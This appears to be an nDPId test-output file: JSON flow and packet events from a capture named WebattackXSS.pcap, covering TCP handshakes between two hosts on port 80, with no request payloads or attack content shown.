-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5805,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":410,"flow_packet_id":3,"flow_last_seen":1499347660448,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347660448,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0SKBAAD4GfTisEAABwKgKMuiyAFDQzcTvYmHcgoAQAOVRzQAAAQEICgE7jHMD5V3n"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5813,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":411,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347661705,"flow_last_seen":1499347661705,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347661705,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59584,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5813,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":411,"flow_packet_id":1,"flow_last_seen":1499347661705,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347661705,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8iZ5AAD4GPDKsEAABwKgKMujAAFBNGwQwAAAAAKACchCVvgAAAgQFtAQCCAoBO42uAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5815,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":411,"flow_packet_id":2,"flow_last_seen":1499347661705,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347661705,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6MCaW9JGTRsEMaAScSDG8gAAAgQFtAQCCAoD5V8jATuNrgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5817,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":411,"flow_packet_id":3,"flow_last_seen":1499347661709,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347661709,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0iZ9AAD4GPDmsEAABwKgKMujAAFBNGwQxmlvSR4AQAOVl+QAAAQEICgE7ja8D5V8j"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5831,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":412,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347664226,"flow_last_seen":1499347664226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347664226,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59610,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5831,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":412,"flow_packet_id":1,"flow_last_seen":1499347664226,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347664226,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Ye5AAD4GY+KsEAABwKgKMujaAFDKDfHLAAAAAKACchAonwAAAgQFtAQCCAoBO5AlAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5832,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":412,"flow_packet_id":2,"flow_last_seen":1499347664227,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347664227,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6NqT+P5Dyg3xzKAScSAxwgAAAgQFtAQCCAoD5WGaATuQJQEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5833,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":412,"flow_packet_id":3,"flow_last_seen":1499347664227,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347664227,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Ye9AAD4GY+msEAABwKgKMujaAFDKDfHMk\/j+RIAQAOXQyQAAAQEICgE7kCUD5WGa"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5843,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":413,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347665473,"flow_last_seen":1499347665473,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347665473,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59624,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5843,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":413,"flow_packet_id":1,"flow_last_seen":1499347665473,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347665473,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8f9VAAD4GRfusEAABwKgKMujoAFDrVO6JAAAAAKACchAJVQAAAgQFtAQCCAoBO5FcAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5844,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":413,"flow_packet_id":2,"flow_last_seen":1499347665473,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347665473,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6OhBKwT561TuiqAScSBdWQAAAgQFtAQCCAoD5WLRATuRXAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5845,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":413,"flow_packet_id":3,"flow_last_seen":1499347665474,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347665474,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0f9ZAAD4GRgKsEAABwKgKMujoAFDrVO6KQSsE+oAQAOX8XwAAAQEICgE7kV0D5WLR"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5864,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":414,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347668069,"flow_last_seen":1499347668069,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347668069,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59650,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5864,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":414,"flow_packet_id":1,"flow_last_seen":1499347668069,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347668069,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8TE1AAD4GeYOsEAABwKgKMukCAFANB9+oAAAAAKACchDz4AAAAgQFtAQCCAoBO5PlAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5865,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":414,"flow_packet_id":2,"flow_last_seen":1499347668069,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347668069,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6QI2lo7HDQffqaAScSDGIgAAAgQFtAQCCAoD5WVaATuT5QEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5866,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":414,"flow_packet_id":3,"flow_last_seen":1499347668070,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347668070,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0TE5AAD4GeYqsEAABwKgKMukCAFANB9+pNpaOyIAQAOVlKQAAAQEICgE7k+YD5WVa"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5870,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":334,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347535081,"flow_last_seen":1499347540761,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347668074,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58224,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5870,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":334,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347535081,"flow_last_seen":1499347540761,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347668074,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58224,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5870,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":335,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347536332,"flow_last_seen":1499347541761,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347668074,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58238,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5870,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":335,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347536332,"flow_last_seen":1499347541761,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347668074,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58238,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5870,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":336,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347537591,"flow_last_seen":1499347542762,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347668074,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58252,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5870,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":336,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347537591,"flow_last_seen":1499347542762,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347668074,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58252,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5870,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":337,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347540145,"flow_last_seen":1499347545763,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347668074,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58278,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5870,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":337,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347540145,"flow_last_seen":1499347545763,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347668074,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58278,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5870,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":338,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347541398,"flow_last_seen":1499347546763,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347668074,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58292,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5870,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":338,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347541398,"flow_last_seen":1499347546763,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347668074,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58292,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5870,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":339,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347542648,"flow_last_seen":1499347547763,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347668074,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58306,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5870,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":339,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347542648,"flow_last_seen":1499347547763,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347668074,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58306,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":415,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347669336,"flow_last_seen":1499347669336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347669336,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59664,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":415,"flow_packet_id":1,"flow_last_seen":1499347669336,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347669336,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8XbZAAD4GaBqsEAABwKgKMukQAFClPsiUAAAAAKACchBxcgAAAgQFtAQCCAoBO5UiAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5874,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":415,"flow_packet_id":2,"flow_last_seen":1499347669336,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347669336,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6RAzOJpLpT7IlaAScSA6UQAAAgQFtAQCCAoD5WaXATuVIgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5875,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":415,"flow_packet_id":3,"flow_last_seen":1499347669337,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347669337,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0XbdAAD4GaCGsEAABwKgKMukQAFClPsiVMziaTIAQAOXZWAAAAQEICgE7lSID5WaX"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5886,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":416,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347670582,"flow_last_seen":1499347670582,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347670582,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59678,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5886,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":416,"flow_packet_id":1,"flow_last_seen":1499347670582,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347670582,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Rc1AAD4GgAOsEAABwKgKMukeAFDr3NOXAAAAAKACchAeiwAAAgQFtAQCCAoBO5ZaAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5887,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":416,"flow_packet_id":2,"flow_last_seen":1499347670582,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347670582,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6R5lF6M+69zTmKAScSCrXwAAAgQFtAQCCAoD5WfPATuWWgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5888,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":416,"flow_packet_id":3,"flow_last_seen":1499347670583,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347670583,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Rc5AAD4GgAqsEAABwKgKMukeAFDr3NOYZRejP4AQAOVKZwAAAQEICgE7lloD5WfP"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5904,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":417,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347673136,"flow_last_seen":1499347673136,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347673136,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59704,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5904,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":417,"flow_packet_id":1,"flow_last_seen":1499347673136,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347673136,"pkt":"ABm5CmnxAMGxFOsxCABFAAA89tVAAD4GzvqsEAABwKgKMuk4AFAtrG4NAAAAAKACchA\/rgAAAgQFtAQCCAoBO5jYAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5905,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":417,"flow_packet_id":2,"flow_last_seen":1499347673136,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347673136,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6ThuKc6nLaxuDqAScSCViQAAAgQFtAQCCAoD5WpNATuY2AEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5906,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":417,"flow_packet_id":3,"flow_last_seen":1499347673137,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347673137,"pkt":"ABm5CmnxAMGxFOsxCABFAAA09tZAAD4GzwGsEAABwKgKMuk4AFAtrG4ObinOqIAQAOU0kQAAAQEICgE7mNgD5WpN"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5916,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":418,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347674433,"flow_last_seen":1499347674433,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347674433,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59718,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5916,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":418,"flow_packet_id":1,"flow_last_seen":1499347674433,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347674433,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8DFZAAD4GuXqsEAABwKgKMulGAFBSGZZKAAAAAKACchDxsQAAAgQFtAQCCAoBO5ocAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5917,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":418,"flow_packet_id":2,"flow_last_seen":1499347674433,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347674433,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6UarF0RiUhmWS6AScSCToAAAAgQFtAQCCAoD5WuRATuaHAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5918,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":418,"flow_packet_id":3,"flow_last_seen":1499347674434,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347674434,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0DFdAAD4GuYGsEAABwKgKMulGAFBSGZZLqxdEY4AQAOUypwAAAQEICgE7mh0D5WuR"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5928,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":419,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347675703,"flow_last_seen":1499347675703,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347675703,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59732,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5928,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":419,"flow_packet_id":1,"flow_last_seen":1499347675703,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347675703,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8jIRAAD4GOUysEAABwKgKMulUAFDpsRfeAAAAAKACchDXOQAAAgQFtAQCCAoBO5taAAAAAAEDAwc="} 